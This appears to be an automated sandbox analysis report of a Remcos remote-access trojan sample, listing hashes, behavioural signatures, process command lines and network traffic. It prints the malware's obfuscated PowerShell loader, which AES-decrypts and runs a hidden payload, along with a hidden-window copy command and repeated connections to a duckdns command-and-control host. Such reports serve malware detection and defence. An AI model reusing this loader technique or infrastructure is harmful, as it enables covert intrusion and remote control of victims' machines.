| MD5 | f6c90ab0db80c6c3ea92556fda7273c7 |
| SHA1 | 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa |
| SHA256 | a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269 |
| SHA512 | aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe |
memory/4172-72-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2916-71-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 679c08c2fcef41f7ff70c991404bbc84 |
| SHA1 | efb3707a241424adc528888f9f161d04be21ef69 |
| SHA256 | 049e9c3cc1fd8c01c6f980e8e87070d02fafa41eae7d60376b939552e7942dc1 |
| SHA512 | 1f2d713f8f3e77efaa7484bdc463ab47541b4673b1e35e77437c87cb7682185b4b76a3823768f5ceb100d7d1c0c73f123282fd4715355f3bdde4228eb455c763 |
memory/4172-75-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-79-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-81-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-95-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-104-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-109-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-111-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-112-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-113-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-114-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-115-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-116-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | bf306e98b8575f3eb0fa3b040090ef41 |
| SHA1 | a50e3c21a00c91aa9af6074816ae9b76dd86c1c0 |
| SHA256 | b0e14b0220c5c706e1f98ff3754f20a7fa1f9b0d3a31555a645a690423770644 |
| SHA512 | 8ddf6857be95e63bdd759c60a888b44f12573b49a57abb5925763b3d7ae6b27363136f43472264bc88e1d38e63357aee52a641fd05481c126af24051e982f5b1 |
memory/4172-118-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-119-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-120-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-121-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-122-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-123-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-124-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-125-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-127-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-128-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-129-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-130-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-131-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-132-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-133-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-135-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-136-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-137-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-138-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-139-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-140-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win10v2004-20231127-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1348 set thread context of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.255.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.96.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.173.246.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 61.122.16.96.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 81.254.221.88.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | | tcp |
Files
memory/1348-9-0x0000026CA4B80000-0x0000026CA4BA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4r2gs4k2.qj2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1348-10-0x00007FF818020000-0x00007FF818AE1000-memory.dmp
memory/1348-11-0x0000026CA2B00000-0x0000026CA2B10000-memory.dmp
memory/1348-12-0x0000026CA2B00000-0x0000026CA2B10000-memory.dmp
memory/1348-13-0x0000026CA5820000-0x0000026CA5FC6000-memory.dmp
memory/1348-15-0x0000026CA5180000-0x0000026CA518C000-memory.dmp
memory/1348-16-0x0000026CA5590000-0x0000026CA5606000-memory.dmp
memory/1348-17-0x0000026CA56D0000-0x0000026CA56EE000-memory.dmp
memory/688-18-0x00007FF818020000-0x00007FF818AE1000-memory.dmp
memory/688-19-0x000001ECFF3C0000-0x000001ECFF3D0000-memory.dmp
memory/688-20-0x000001ECFF3C0000-0x000001ECFF3D0000-memory.dmp
memory/688-34-0x00007FF818020000-0x00007FF818AE1000-memory.dmp
memory/4388-35-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b64ff2ae44d032883eee0bf43885c39f |
| SHA1 | baf974d8bec991bbb2a78448df486e3f8feb9eac |
| SHA256 | ca6c601ebd0645e9a7077b3a9e92f684fcb045b8b4632e0a9a452b86e01c9902 |
| SHA512 | 9860476548a6793f0f48ae45b1ff3b501737dd485e652114a5c0a15793e08d6d56c6f0caaac29866eb929f1bf61b310e973f35dd8f43a1381eab1faf0ef089f3 |
memory/1348-39-0x00007FF818020000-0x00007FF818AE1000-memory.dmp
memory/4388-40-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-43-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-44-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4388-46-0x0000000000400000-0x0000000000482000-memory.dmp
